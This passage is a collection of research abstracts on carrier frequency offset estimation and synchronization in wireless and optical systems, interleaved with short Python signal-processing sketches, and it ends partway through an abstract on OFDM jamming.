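    """Estimate K normalized frequencies (cycles/sample) from a superposition of
    complex exponentials in noise using standard one-dimensional ESPRIT."""
    x = np.asarray(x)
    N = len(x)
    M = M or N // 2                                   # subarray (window) length
    # Hankel-structured data matrix of overlapping snapshots
    X = np.column_stack([x[i:i + M] for i in range(N - M + 1)])
    R = X @ X.conj().T / X.shape[1]                   # sample covariance
    eigvals, eigvecs = np.linalg.eigh(R)
    Us = eigvecs[:, -K:]                              # signal subspace (K largest eigenvalues)
    # Rotational invariance between the two staggered subarrays
    Psi = np.linalg.lstsq(Us[:-1], Us[1:], rcond=None)[0]
    return np.sort(np.angle(np.linalg.eigvals(Psi)) / (2 * np.pi))

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    n = np.arange(256)
    true_f = [0.05, 0.12]                             # e.g. two users' CFOs (illustrative)
    x = sum(np.exp(2j * np.pi * f * n) for f in true_f)
    x += 0.1 * (rng.standard_normal(256) + 1j * rng.standard_normal(256))
    print("Estimated frequencies:", esprit_freqs(x, K=2))
```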
--- paper_title: A Novel Code-Aided Carrier Recovery Algorithm for Coded Systems paper_content: We present a novel code-aided carrier recovery method for low-density parity-check (LDPC) coded systems, which comprises two supporting algorithms: 1) a coarse synchronization by maximizing a cost function, the mean absolute value of the soft outputs of the LDPC decoder, followed by a simple interpolation operation to improve the estimation accuracy and 2) a fine synchronization based on the soft decisions produced by the LDPC decoder. With moderate computational complexity, this proposed algorithm is designed to synchronize signals with large carrier frequency offset and phase offset at low signal-to-noise ratio (SNR). When applied to the case of an 8-PSK system with (1944,972) LDPC code, the performance loss compared to the case of ideal synchronization is negligible. --- paper_title: Effective Adaptive Iteration Algorithm for Frequency Tracking and Channel Estimation in OFDM Systems paper_content: For joint maximum-likelihood (ML) frequency tracking and channel estimation using orthogonal frequency-division multiplexing (OFDM) training blocks in OFDM communications over mobile wireless channels, a major difficulty is the local extrema or multiple-solution complication arising from the multidimensional log-likelihood function. To overcome this, we first obtain crude ML frequency-offset estimators using single-time-slot samples from the received time-domain OFDM block. These crude frequency estimators are shown to have unique closed-form solutions. We then optimally combine these crude frequency estimators in the linear-minimum-mean-square-error (LMMSE) sense for a more accurate solution. Finally, by alternatively updating the LMMSE frequency estimator and the ML channel estimator through adaptive iterations, we successfully avoid the use of a multidimensional log-likelihood function, hence obviating the complex task of global solution search and, meanwhile, achieve good estimation performance. Our estimators have mean square errors (MSEs) tightly close to Cramer-Rao bounds (CRBs) with a wide tracking range. --- paper_title: MMSE-Based CFO Compensation for Uplink OFDMA Systems with Conjugate Gradient paper_content: In this paper, we present a low-complexity carrier frequency offset (CFO) compensation algorithm based on the minimum mean square error (MMSE) criterion for uplink orthogonal frequency division multiple access systems. CFO compensation with an MMSE filter generally requires an inverse operation on an interference matrix whose size equals the number of subcarriers. Thus, the computational complexity becomes prohibitively high when the number of subcarriers is large. To reduce the complexity, we employ the conjugate gradient (CG) method which iteratively finds the MMSE solution without the inverse operation. To demonstrate the efficacy of the CG method for our problem, we analyze the interference matrix and present several observations which provide insight on the iteration number required for convergence. The analysis indicates that for an interleaved carrier assignment scheme, the maximum iteration number for computing an exact solution is at most the same as the number of users. Moreover, for a general carrier assignment scheme, we show that the CG method can find a solution with far fewer iterations than the number of subcarriers. 
In addition, we propose a preconditioning technique which speeds up the convergence of the CG method at the expense of slightly increased complexity for each iteration. As a result, we show that the CFO can be compensated with substantially reduced computational complexity by applying the CG method. --- paper_title: Blind iterative frequency offset estimator for orthogonal frequency division multiplexing systems paper_content: This study presents an iterative carrier frequency offset estimator for orthogonal frequency division multiplexing (OFDM) systems. The proposed estimator is based on the efficient Viterbi-and-Viterbi (VAV) algorithm. The proposed estimator is blind and can be used with non-constant modulus subcarrier modulations such as quadrature amplitude modulation (QAM). The performance of the proposed estimator is assessed theoretically and via Monte Carlo simulations over various channel models and compared to the performance of other well established blind techniques in addition to the Cramer–Rao lower bound. The comparison results demonstrate that the proposed estimator outperforms other well-established blind estimators by more than 12 dB at moderate and high signal-to-noise ratios (SNRs). --- paper_title: Channel Estimation and Equalization for Asynchronous Single Frequency Networks paper_content: Single carrier frequency-domain equalization (SC-FDE) modulations are known to be suitable for broadband wireless communications due to their robustness against severe time-dispersion effects and the relatively low envelope fluctuations of the transmitted signals. In this paper, we consider the use of SC-FDE schemes in broadcasting systems. A single frequency network transmission is assumed, and we study the impact of distinct carrier frequency offset (CFO) between the local oscillator at each transmitter and the local oscillator at the receiver. We propose an efficient method for estimating the channel frequency response and CFO associated to each transmitter and propose receiver structures able to compensate the equivalent channel variations due to different CFO for different transmitters. Our performance results show that we can have excellent performance, even when transmitters have substantially different frequency offsets. --- paper_title: Joint channel, phase noise, and carrier frequency offset estimation in cooperative OFDM systems paper_content: Cooperative communication systems employ cooperation among nodes in a wireless network to increase data throughput and robustness to signal fading. However, such advantages are only possible if there exist perfect synchronization among all nodes. Impairments like channel multipath, time varying phase noise (PHN) and carrier frequency offset (CFO) result in the loss of synchronization and diversity performance of cooperative communication systems. Joint estimation of these multiple impairments is necessary in order to correctly decode the received signal in cooperative systems. In this paper, we propose an iterative pilot-aided algorithm based on expectation conditional maximization (ECM) for joint estimation of multipath channels, Wiener PHNs, and CFOs in amplify-and-forward (AF) based cooperative orthogonal frequency division multiplexing (OFDM) system. Numerical results show that the proposed estimator achieves mean square error performance close to the derived hybrid Cramer-Rao lower bound (HCRB) for different PHN variances. 
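To convey the flavor of the alternating conditional updates used by ECM-type joint estimators such as the one described above, the following Python sketch alternates a least-squares channel update with a one-dimensional CFO grid search for a single time-domain pilot. It is a deliberately simplified stand-in, assuming a single link, no phase noise, and a grid search in place of closed-form maximization steps; the function and parameter names (alternating_cfo_channel, eps_grid, num_iters) are illustrative and are not taken from the paper.

```python
import numpy as np

def alternating_cfo_channel(r, s, L, eps_grid, num_iters=5):
    """Alternating (conditional-maximization style) estimation of a single CFO and an
    L-tap channel from a time-domain pilot s, for r[n] = e^{j*2*pi*eps*n/N} (h*s)[n] + w[n]."""
    N = len(r)
    n = np.arange(N)
    # Convolution matrix so that S @ h equals the channel-filtered pilot, truncated to N samples
    S = np.column_stack([np.concatenate([np.zeros(l), s[:N - l]]) for l in range(L)])
    eps_hat = 0.0
    h_hat = np.zeros(L, dtype=complex)
    for _ in range(num_iters):
        # (1) Channel update: least squares given the current CFO estimate
        r_derot = r * np.exp(-2j * np.pi * eps_hat * n / N)
        h_hat, *_ = np.linalg.lstsq(S, r_derot, rcond=None)
        # (2) CFO update: one-dimensional grid search given the current channel estimate
        mu = S @ h_hat
        costs = [np.linalg.norm(r - np.exp(2j * np.pi * e * n / N) * mu) for e in eps_grid]
        eps_hat = eps_grid[int(np.argmin(costs))]
    return eps_hat, h_hat
```

A typical call would pass a known pilot sequence s and something like eps_grid = np.linspace(-0.5, 0.5, 1001), where eps is the CFO normalized to the subcarrier spacing.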
--- paper_title: Progressive Frequency-Offset Compensation in Turbo Receivers paper_content: Based on the recently-proposed iterative receiver by Colavolpe et al., we extend it to further incorporate the mechanism of frequency-offset compensation. As a progressive approach, the factor graph of a long frame is first divided into numerous subgraphs of short block, iterative decoding can successfully start its work as the effect of frequency-offset can be well mitigated due to the small size of subgraph. As the iteration goes on, the extrinsic information from decoder can be employed to get finer estimate of the frequency-offset. The system performance can be steadily improved as the block size is progressively expanded to the final frame size. --- paper_title: Joint Semi-Blind Channel Estimation and Synchronization in Two-Way Relay Networks paper_content: In this paper, we propose a synchronization and channel estimation method for amplify-and-forward two-way relay networks (AF-TWRNs) based on a low-complexity maximum-likelihood (LCML) algorithm and a joint synchronization and channel estimation (JSCE) algorithm. For synchronous AF-TWRNs, the LCML algorithm blindly estimates general nonreciprocal flat-fading channels. We formulate the channel estimation as a convex optimization problem and obtain a closed-form channel estimator. Based on the mean square error (MSE) analysis of the LCML algorithm, we propose a generalized LCML (GLCML) algorithm to perform channel estimation in the presence of the timing offset. Based on the approximation of the LCML algorithm, the JSCE algorithm is proposed to estimate jointly the timing offset and channel parameters. The theoretical analysis shows that the closed-form LCML channel estimator is consistent and unbiased. The analytical MSE expression shows that the estimation error approaches zero in scenarios with either a high signal-to-noise ratio (SNR) or a large frame length. Monte Carlo simulations are employed to verify the theoretical MSE analysis of the LCML algorithm. In the absence of perfect timing synchronization, the GLCML algorithm selects an estimation sample, which produces the optimal channel estimation, according to the MSE analysis. Simulation results also demonstrate that the JSCE algorithm is able to achieve accurate timing offset estimation. --- paper_title: Multi-tone CDMA design for arbitrary frequency offsets using orthogonal code multiplexing at the transmitter and a tunable receiver paper_content: The authors propose a new multi-tone (MT) code division multiple access (CDMA) design which has a superior bit error rate (BER) performance than conventional MT CDMA in the presence of frequency offset. The design involves multiplexing of Walsh codes onto the sub-carriers in conjunction with double differential modulation. To exploit the full potential of the design a partial correlation receiver has been proposed. Depending on the signal-to-noise ratio (SNR) and frequency offset it is possible to tune this receiver for the best possible performance. The simulated BER performance of the proposed system has been found to be better than MT CDMA for small as well as large frequency offsets for both single and multi-user systems in additive white Gaussian noise (AWGN) and Rayleigh fading channels. 
--- paper_title: Combined MMSE-FDE and Interference Cancellation for Uplink SC-FDMA with Carrier Frequency Offsets paper_content: Due to its lower peak-to-average power ratio (PAPR) compared with orthogonal frequency division multiple access (OFDMA), single carrier frequency division multiple access (SC-FDMA) has been recently accepted as the uplink multiple access scheme in the Long Term Evolution (LTE) of cellular systems by the Third Generation Partnership Project (3GPP). However, similar to OFDMA, carrier frequency offset (CFO) can destroy the orthogonality among subcarriers and degrade the performance of SC-FDMA. To mitigate the effect of CFOs, we propose a combined minimum mean square error frequencydomain equalization (MMSE-FDE) and interference cancellation scheme. In this scheme, joint FDE with CFO compensation (JFC) is utilized to obtain the initial estimation for each user. In contrast to previous schemes, where the FDE and CFO compensation are done separately, in JFC, the MMSE FDE is designed to suppress the MUI after CFO compensation. To further eliminate the MUI, we combine JFC with parallel interference cancellation (PIC). In particular, we iteratively design the MMSE FDE equalizer to suppress the remaining MUI at each stage and obtain better estimation. Simulation results show that the proposed scheme can significantly improve the system performance. --- paper_title: Maximum Likelihood Frequency Offset Estimation in Multiple Access Time-Hopping UWB paper_content: Frequency offset estimation for time-hopping (TH) ultra-wide-band (UWB) is addressed in the literature by relying on an AWGN assumption and by exploiting a periodic preamble appended to each packet. In this paper we generalize these techniques with two aims. First, we identify a solution which does not rely on any periodic structure, but can be implemented with a generic TH format. Second, we identify a solution which is robust to multiple access interference (MAI) by assuming a Gaussian mixture (GM) model for MAI. In fact, GMs have recently been identified as good descriptors of UWB interference, and they provide closed form and limited complexity results. With these ideas in mind, we build a data aided maximum likelihood (ML) estimator. The proposed ML solution shows quasi optimum performance in the Cramer-Rao bound sense, and proves to be robust in meaningful multiple user scenarios. --- paper_title: Accurate Two-Stage Frequency Offset Estimation for Coherent Optical Systems paper_content: We present a two-stage feedforward frequency offset estimation (FOE) algorithm on the basis of the phase-difference method. The first stage of the proposed FOE generates a rough FOE through averaging the phase difference between two adjacent symbols and compensates the signals. The second stage of the FOE estimates the residual FO through averaging the phase difference of two symbols with distance L , which provides a significantly larger noise-tolerance and thus improves system performance. The proposed FOE can be applied to both quadrature phase-shift keying and 16-quadrature amplitude modulation systems. Simulations show that the mean square error of the proposed FOE can be reduced through an order of two in magnitude under small laser linewidth situation compared with the classic phase-difference-based FOE. The experimental result shows that the proposed FOE gives 0.6-dB optical-signal-to-noise-ratio improvement against the classic FOE, which validates its usefulness. 
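The two-stage phase-difference idea described above can be sketched compactly. The Python code below is a generic M-th power differential estimator in that spirit, assuming QPSK symbols and illustrative parameters (lag, symbol count, noise level); it is not the paper's exact algorithm and omits the laser phase-noise modelling.

```python
import numpy as np

def phase_diff_foe(x, M=4, lag=1):
    """M-th power phase-difference frequency offset estimate (cycles/symbol) from
    M-PSK symbols x, using symbol pairs separated by `lag`."""
    d = x[lag:] * np.conj(x[:-lag])          # differential terms carry e^{j*2*pi*f*lag}
    return np.angle(np.sum(d ** M)) / (2 * np.pi * M * lag)

def two_stage_foe(x, M=4, lag=8):
    """Two-stage estimate: coarse adjacent-symbol stage, then a residual stage with a
    larger symbol distance for finer resolution (QPSK by default)."""
    f1 = phase_diff_foe(x, M=M, lag=1)                       # coarse stage
    n = np.arange(len(x))
    x_comp = x * np.exp(-2j * np.pi * f1 * n)                # compensate the coarse estimate
    f2 = phase_diff_foe(x_comp, M=M, lag=lag)                # residual stage
    return f1 + f2

if __name__ == "__main__":
    rng = np.random.default_rng(2)
    sym = np.exp(1j * (np.pi / 2) * rng.integers(0, 4, 4096) + 1j * np.pi / 4)  # QPSK
    f_true = 0.003                                            # cycles per symbol
    n = np.arange(sym.size)
    r = sym * np.exp(2j * np.pi * f_true * n)
    r += 0.05 * (rng.standard_normal(sym.size) + 1j * rng.standard_normal(sym.size))
    print("Estimated offset:", two_stage_foe(r))
```

The larger symbol distance in the second stage trades acquisition range for estimation accuracy, which is the noise-tolerance benefit claimed in the abstract.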
--- paper_title: Blind Carrier Frequency Offset Estimation for Interleaved OFDMA Uplink paper_content: In this paper, we develop two novel blind carrier frequency offset (CFO) estimators for interleaved orthogonal frequency division multiple access (OFDMA) uplink transmission in a multiantenna system. The first estimator is the subspace-based one and could blindly estimate multiple CFOs from a rank reduction approach. The second estimator is based on the maximum likelihood (ML) approach and improves the performance as compared to the first one. The higher computational complexity of the ML estimator is alleviated by the alternating projection (AP) method. Both the proposed estimators support fully loaded data transmissions, i.e., all subcarriers being occupied, which provides higher bandwidth efficiency as compared to the existing schemes. The numerical results are then provided to corroborate the proposed studies. --- paper_title: Practical Timing and Frequency Synchronization for OFDM-Based Cooperative Systems paper_content: In this paper, we investigate the timing and carrier frequency offset (CFO) synchronization problem in decode and forward cooperative systems operating over frequency selective channels. A training sequence which consists of one orthogonal frequency-division multiplexing (OFDM) block having a tile structure in the frequency domain is proposed to perform synchronization. Timing offsets are estimated using correlation-type algorithms. By inserting some null subcarriers in the proposed tile structure, we propose a computationally efficient subspace decomposition-based algorithm for CFO estimation. The issue of optimal tile length is studied both theoretically and through simulations. By judiciously designing the tile size of the pilot, the proposed algorithms are shown to have better performance, in terms of synchronization errors and bit error rate, than the time-division multiplexing-based training method and the computationally demanding space-alternating generalized expectation-maximization algorithm. --- paper_title: A Low-Complexity ML Estimator for Carrier and Sampling Frequency Offsets in OFDM Systems paper_content: This letter considers the joint acquisition of the carrier frequency offset (CFO) and sampling frequency offset (SFO) in OFDM systems using two long training symbols in the preamble. Conventional maximum-likelihood (ML) methods require a two-dimensional exhaustive search. To overcome this problem, a low-complexity closed-form ML estimator is proposed. It is shown that the CFO can be solved in closed-form. Then we develop an approximate ML estimation algorithm for the SFO by taking the second-order Taylor series expansion. Simulation results show that the proposed algorithm achieves almost the same performance as existing ML methods, but no exhaustive search is needed. --- paper_title: Low complexity LS and MMSE based CFO compensation techniques for the uplink of OFDMA systems paper_content: Orthogonal frequency division multiple access (OFDMA), where different subcarriers are allocated to different users, has been adopted for the uplink of several standards and has attracted a great deal of attention as a result. However, OFDMA is highly sensitive to carrier frequency offset (CFO) between the transmitter and receiver. In the uplink, different carrier frequency offsets due to different users can adversely affect subcarrier orthogonality. 
We propose a low complexity CFO compensation approach that addresses this problem while maintaining optimal performance. This approach is based on the least squares and minimum mean square error criteria applicable to interleaved and block interleaved carrier assignment schemes. The proposed algorithms use the special block circulant property of the interference matrix. In contrast to existing CFO compensation techniques, our algorithms do not rely on iterations or approximations. We present our approach in this paper and describe how a considerable reduction in computational complexity can be achieved by adopting it. --- paper_title: A Time Domain Inverse Matrix Receiver for CFO Suppression in WIMAX Uplink System paper_content: In orthogonal frequency division multiple access (OFDMA) uplink system, orthogonal multiple subcarriers are assigned to different users for parallel high data rate communications. However, carrier frequency offset (CFO), which is mainly due to oscillator mismatches and/or Doppler shift, will destroy the orthogonality among subcarriers and introduce intercarrier interference (ICI) as well as multiple-access interference (MAI) in uplink scenario. Thus, system performance will be seriously degraded. To overcome this problem, it is of great importance to do research on suppression of the interferences caused by CFO. In this paper, we proposed a novel time domain inverse matrix receiver to suppress the interference of multiple CFOs. Compared with the conventional frequency domain direct ZF inverse matrix method, which has high complexity in obtaining the ICI matrix and its inverse matrix, the proposed method has very low complexity in obtaining the interference matrix. Furthermore, the signal after interference suppression is a frequency domain signal. Thus the receiver complexity can be simplified. Simulation results show that this algorithm has almost the same performance to the frequency domain direct ZF inverse matrix method. --- paper_title: Energy efficient M2M signaling with enhanced gateway: Detection and offset compensation paper_content: Machine to machine (M2M) communication networks are designed to enable communications between an ultra low-power, low-cost wireless sensor motes and the unconstrained access network. Given such asymmetric constraints in the M2M communications, effective techniques should aim to minimize the overall energy consumed in the sensor mote. We consider an M2M network with an enhanced sensor gateway (ESG), where the ESG is designed to compensate for limitations at the sensor mote. We consider energy efficient transmission at the mote, and propose spreading codes as well as a low-complexity detector at the ESG. Subsequently, we specify the frequency offset problem at the sensor mote and propose algorithms to compensate for frequency offset at ESG. We observe that the proposed detection and offset compensation scheme can perform 0.6 dB worse than the optimal detector without frequency offset. --- paper_title: Combined PA/NPA CFO Recovery for FBMC Transmissions over Doubly-Selective Fading Channels paper_content: This paper deals with carrier frequency offset recovery for burst-mode filter-bank multicarrier transmission over channels affected by severe time-frequency selective fading. 
Unlike previously proposed algorithms, in which the frequency is recovered either by relying on known pilot symbols multiplexed with the data stream (pilot-aided, or PA, approach) or by exploiting specific properties of the multicarrier signal structure in a non-pilot-aided (NPA) fashion, here we present and discuss an algorithm based on the maximum likelihood principle, which can be regarded as combined PA/NPA since it takes advantage of both pilot symbols and, indirectly, data symbols through knowledge and exploitation of their specific modulation format. The algorithm requires the availability of the statistical properties of channel fading up to second-order moments. It is shown that the above approach improves on both the estimation accuracy and the frequency acquisition range of previously published schemes. --- paper_title: Hard decision directed frequency tracking for OFDM on frequency selective channel paper_content: This paper presents a decision-directed frequency tracking scheme to improve the spectrum efficiency of Orthogonal Frequency Division Modulation (OFDM) transmission over frequency selective channels. OFDM divides a broadband channel into parallel narrowband subchannels with different channel characteristics. The subcarriers with lower attenuation are selected for decision-directed frequency tracking. A phase error detection method is needed to keep the hard decisions stable during tracking. The algorithm ensures that the carrier frequency offset can be recovered from the detected phase error. The mean square error (MSE) estimate and the loop bandwidth are also presented. Simulations illustrate that this scheme has better MSE and bit error rate performance than the traditional scheme. Furthermore, pilots are saved in this scheme, which leads to improved spectrum efficiency. --- paper_title: Differential modulation for amplify-and-forward two-way relaying with carrier offsets paper_content: In this paper, differential modulation (DM) schemes, including single differential and double differential, are proposed for amplify-and-forward two-way relaying (TWR) networks with unknown channel state information (CSI) and carrier frequency offsets. Most existing work in TWR assumes perfect channel knowledge at all nodes and no carrier offsets. However, accurate CSI can be difficult to obtain for fast-varying channels and increases the computational complexity of channel estimation, and commonly encountered carrier offsets can greatly degrade the system performance. Therefore, we propose two schemes to remove the effect of unknown frequency offsets for TWR networks, when neither the sources nor the relay has any knowledge of the CSI. Simulation results show that the proposed differential modulation schemes are both effective in overcoming the impact of carrier offsets with linear computational complexity. --- paper_title: Channel, Phase Noise, and Frequency Offset in OFDM Systems: Joint Estimation, Data Detection, and Hybrid Cramer-Rao Lower Bound paper_content: Oscillator phase noise (PHN) and carrier frequency offset (CFO) can adversely impact the performance of orthogonal frequency division multiplexing (OFDM) systems, since they can result in intercarrier interference and rotation of the signal constellation. In this paper, we propose an expectation conditional maximization (ECM) based algorithm for joint estimation of channel, PHN, and CFO in OFDM systems.
We present the signal model for the estimation problem and derive the hybrid Cramer-Rao lower bound (HCRB) for the joint estimation problem. Next, we propose an iterative receiver based on an extended Kalman filter for joint data detection and PHN tracking. Numerical results show that, compared to existing algorithms, the performance of the proposed ECM-based estimator is closer to the derived HCRB and outperforms the existing estimation algorithms at moderate-to-high signal-to-noise ratio (SNR). In addition, the combined estimation algorithm and iterative receiver are more computationally efficient than existing algorithms and result in improved average uncoded and coded bit error rate (BER) performance. --- paper_title: Eigenvalue-Based Spectrum Sensing of Orthogonal Space-Time Block Coded Signals paper_content: We consider spectrum sensing of signals encoded with an orthogonal space-time block code (OSTBC). We propose a CFAR detector based on knowledge of the eigenvalue multiplicities of the covariance matrix which are inherent owing to the OSTBC and derive theoretical performance bounds. In addition, we show that the proposed detector is robust to a carrier frequency offset, and propose a detector that deals with timing synchronization using the detector for the synchronized case as a building block. The proposed detectors are shown numerically to perform well. --- paper_title: Design of Data-Aided SNR Estimator Robust to Frequency Offset for MPSK Signals paper_content: Data-aided (DA) signal-to-noise ratio (SNR) estimation is required especially at low SNR. The conventional maximum likelihood (ML) DA SNR estimator requires perfect carrier phase estimation and frequency recovery. In this paper, we propose a novel carrier-frequency-robust DA SNR estimator, together with an improved variant, using the autocorrelation of received MPSK symbols. Computer simulations are used to examine their performance in terms of mean estimation value (MEV) and normalized mean square error (NMSE). For the example system in the simulations, the MEV of the proposed estimator is sufficiently accurate with a normalized frequency error on the order of the symbol rate. However, its NMSE cannot reach the DA normalized Cramer-Rao bound (NCRB) even with a large observation length, and it may perform slightly worse at high SNR for short pilot sequences. Fortunately, its improved variant can reach the NCRB with enough pilot symbols. Moreover, the proposed DA SNR estimators can operate under large frequency errors, or before the frequency recovery unit, at the baud rate. The implementation complexity is also analyzed. --- paper_title: ICI Analysis for FRFT-OFDM Systems to Frequency Offset in Time-Frequency Selective Fading Channels paper_content: This letter presents the effects of frequency offset on orthogonal frequency division multiplexing systems based on the fractional Fourier transform (FRFT-OFDM) in time-frequency selective fading channels. FRFT-OFDM systems generalize OFDM systems based on the discrete Fourier transform by the deployment of the FRFT. Expressions for the signal-to-interference ratio (SIR) due to ICI are derived for different fading channels. In a flat channel, the performance of both systems is the same. In a frequency selective channel, the FRFT-OFDM systems achieve superior SIR performance by choosing the optimal fractional factor, when the Doppler spread is comparable to the inverse of the symbol duration or a carrier offset exists in the system.
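For the special case of conventional DFT-based OFDM over a flat channel (rather than the FRFT generalization or the fading-channel expressions derived in the letter above), the SIR due to CFO-induced ICI can be computed directly from the classic ICI coefficients, as in the hedged Python sketch below; the FFT size and offset values are illustrative assumptions.

```python
import numpy as np

def ofdm_ici_sir_db(eps, N=64):
    """SIR (dB) at one subcarrier of a conventional DFT-based OFDM system with a
    normalized CFO eps (fraction of subcarrier spacing), flat channel, no phase noise."""
    k = np.arange(N)
    # Magnitudes of the classic ICI coefficients S_k for a frequency offset of eps
    num = np.sin(np.pi * (eps + k))
    den = N * np.sin(np.pi * (eps + k) / N)
    Sk = np.abs(num / den)
    signal = Sk[0] ** 2                      # desired-subcarrier term (k = 0)
    interference = np.sum(Sk[1:] ** 2)       # leakage from all other subcarriers
    return 10 * np.log10(signal / interference)

if __name__ == "__main__":
    for eps in (0.01, 0.05, 0.1, 0.2):
        print(f"eps = {eps:>4}: SIR = {ofdm_ici_sir_db(eps):.1f} dB")
```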
--- paper_title: Blind carrier frequency offset estimation for interleaved orthogonal frequency division multiple access uplink with multi-antenna receiver: algorithms and performance analysis paper_content: In this study, for interleaved orthogonal frequency division multiple access uplink with multi-antenna receiver, we propose two generalised carrier frequency offset estimators which, respectively, exploit the subspace theory and maximum-likelihood (ML) criterion. We find that, as long as the numbers of multipaths from two of the users are smaller than the number of antennas at the receiver, both the proposed estimators support fully loaded transmissions. We also derive the theoretical performance lower bound for the proposed ML estimator. The numerical results are then provided, which corroborate the proposed studies. --- paper_title: Frequency Offset Estimation with Increased Nyquist Frequency paper_content: In wireless communication systems, there is a need to estimate and compensate for frequency offsets. What is common to frequency offset estimators, is that they only can give correct results within a certain range, up to the Nyquist frequency. This makes a difference especially in OFDM systems with pilots only at certain symbols, such as LTE. In this paper we present an algorithm where the Nyquist frequency is increased, up to the same value as if pilots were present in all OFDM symbols. The algorithm is based on using two or more frequency offset estimators, with lower, but different, Nyquist frequencies. --- paper_title: Effective Symbol Timing Recovery Based on Pilot-Aided Channel Estimation for MISO Transmission Mode of DVB-T2 System paper_content: This paper proposes an effective symbol timing recovery (STR) based on a pilot-aided channel impulse response (CIR) estimation for multi-input single-output (MISO) transmission mode of DVB-T2 system. In particular, this paper focuses on fine STR capable of resolving an ambiguity effect of the CIR which is caused by an inaccurate coarse symbol timing offset (STO). In the proposed fine STR, the CIR of the MISO channel is estimated after performing coarse STR. Then, the ambiguity of the CIR is investigated by categorizing it into four regions under the assumption of an inaccurate STO. Finally, accurate STO is estimated by changing the fast Fourier transform (FFT) window with respect to the ambiguity categorization. Performance evaluations are accomplished by comparing the proposed STR with the conventional STR in large delay channels. --- paper_title: A Time-Domain Joint Estimation Algorithm for CFO and I/Q Imbalance in Wideband Direct-Conversion Receivers paper_content: Carrier frequency offset (CFO) and in-phase and quadrature-phase (I/Q) imbalance are two of the common front-end impairments in low-cost communication devices. It is known that CFO can cause significant performance degradation in multi-carrier modulation (MCM) systems. Also, the existence of the I/Q imbalance usually reduces the accuracy of CFO estimation. In this paper, we propose a new data-aided scheme for the joint estimation of CFO and I/Q imbalance using simple matrix formulation. The proposed algorithms utilize only the periodicity of the generalized periodic pilot (GPP). They do not need to know the channel impulse response and the exact values of the training sequence. Moreover, our method has a low complexity and its performance compares favorably with the existing methods. 
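A minimal illustration of the periodicity-based estimation exploited by the generalized periodic pilot above: the Python sketch below estimates a CFO by correlating two identical pilot repetitions (a Moose-style estimator), ignoring the I/Q imbalance part of the algorithm and any multipath edge effects; the pilot length, offset and noise level are illustrative assumptions.

```python
import numpy as np

def periodic_pilot_cfo(r, P):
    """Estimate the CFO (cycles per sample) from a received pilot that repeats every
    P samples, by correlating the two halves; valid for |CFO| < 1/(2P)."""
    corr = np.sum(r[P:2 * P] * np.conj(r[:P]))
    return np.angle(corr) / (2 * np.pi * P)

if __name__ == "__main__":
    rng = np.random.default_rng(3)
    P = 64
    pilot = rng.standard_normal(P) + 1j * rng.standard_normal(P)
    tx = np.tile(pilot, 2)                               # two identical pilot periods
    f = 2e-3                                             # CFO in cycles/sample
    n = np.arange(2 * P)
    r = tx * np.exp(2j * np.pi * f * n)
    r += 0.05 * (rng.standard_normal(2 * P) + 1j * rng.standard_normal(2 * P))
    print("CFO estimate:", periodic_pilot_cfo(r, P))
```

The estimate relies only on the repetition of the transmitted block, not on knowledge of its values, which is the property the data-aided scheme above generalizes.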
--- paper_title: Universal-filtered multi-carrier technique for wireless systems beyond LTE paper_content: In this paper, we propose a multi-carrier transmission scheme to overcome the problem of intercarrier interference (ICI) in orthogonal frequency division multiplexing (OFDM) systems. In the proposed scheme, called universal-filtered multi-carrier (UFMC), a filtering operation is applied to a group of consecutive subcarriers (e.g. a given allocation of a single user) in order to reduce out-of-band sidelobe levels and subsequently minimize the potential ICI between adjacent users in case of asynchronous transmissions. We consider a coordinated multi-point (CoMP) reception technique, where a number of base stations (BSs) send the received signals from user equipments (UEs) to a CoMP central unit (CCU) for joint detection and processing. We examine the impact of carrier frequency offset (CFO) on the performance of the proposed scheme and compare the results with the performance of cyclic prefix based orthogonal frequency division multiplexing (CP-OFDM) systems. We use computer experiments to illustrate the efficiency of the proposed multi-carrier scheme. The results indicate that the UFMC scheme outperforms the OFDM for both perfect and non-perfect frequency synchronization between the UEs and BSs. --- paper_title: Resource Efficient Implementation of Low Power MB-OFDM PHY Baseband Modem With Highly Parallel Architecture paper_content: The multi-band orthogonal frequency-division multiplexing modem needs to process large amount of computations in short time for support of high data rates, i.e., up to 480 Mbps. In order to satisfy the performance requirement while reducing power consumption, a multi-way parallel architecture has been proposed. But the use of the high degree parallel architecture would increase chip resource significantly, thus a resource efficient design is essential. In this paper, we introduce several novel optimization techniques for resource efficient implementation of the baseband modem which has highly, i.e., 8-way, parallel architecture, such as new processing structures for a (de)interleaver and a packet synchronizer and algorithm reconstruction for a carrier frequency offset compensator. Also, we describe how to efficiently design several other components. The detailed analysis shows that our optimization technique could reduce the gate count by 27.6% on average, while none of techniques degraded the overall system performance. With 0.18-μm CMOS process, the gate count and power consumption of the entire baseband modem were about 785 kgates and less than 381 mW at 66 MHz clock rate, respectively. --- paper_title: A Novel Hierarchical Low Complexity Synchronization Method for OFDM Systems paper_content: A new hierarchical synchronization method is proposed for initial timing synchronization in orthogonal frequency-division multiplexing(OFDM) systems. Based on the proposal of new training symbol, a threshold based timing metric is designed for accurate estimation of start of OFDM symbol in a frequency selective channel. Threshold is defined in terms of noise distributions and false alarm, which makes it independent of type of channel it is applied. Frequency offset estimation is also done for the proposed training symbol. The performance of the proposed timing metric is evaluated using simulation results. 
The proposed method achieves low mean squared error(MSE) in timing offset estimation at five(5 x) times lower computational complexity compared to cross-correlation based method in a frequency selective channel. It is also computationally efficient compared to hybrid approaches for OFDM timing synchronization. --- paper_title: Blind Identification of Spatial Multiplexing and Alamouti Space-Time Block Code via Kolmogorov-Smirnov (K-S) Test paper_content: A novel algorithm for blind identification of spatial multiplexing and Alamouti space-time block code is proposed in this paper. It relies on the Kolmogrov-Smirnov test, and employs the maximum distance between the empirical cumulative distribution functions of two statistics derived from the received signal. The proposed algorithm does not require estimation of the channel coefficients, noise statistics and modulation type, and is robust to the carrier frequency offset and impulsive noise. Additionally, it outperforms the algorithms in the literature under a variety of transmission impairments. --- paper_title: Performance impact of asynchronous off-tone jamming attacks against OFDM paper_content: This paper presents power efficient asynchronous off-tone jamming attacks on orthogonal frequency division multiplexing (OFDM). Often wireless communication systems have to operate in environments, which are prone to unknown interference from adversaries such as jamming, which can lead to degradation of performance. This paper begins with presenting existing conventional jamming attacks, such as barrage jamming (BJ), partial band jamming (PBJ), single-tone jamming (STJ), and multi-tone jamming (MTJ) on OFDM and then proposes new power efficient jamming strategies. It is known that signal with frequency offset can affect more spectrum than the occupied bandwidth as the signal energy gets smeared into adjacent spectrum while performing FFT in the OFDM receiver, and thus create inter-channel interference (ICI). This paper builds on this idea, and presents new asynchronous single off-tone and multiple off-tone jamming attacks on 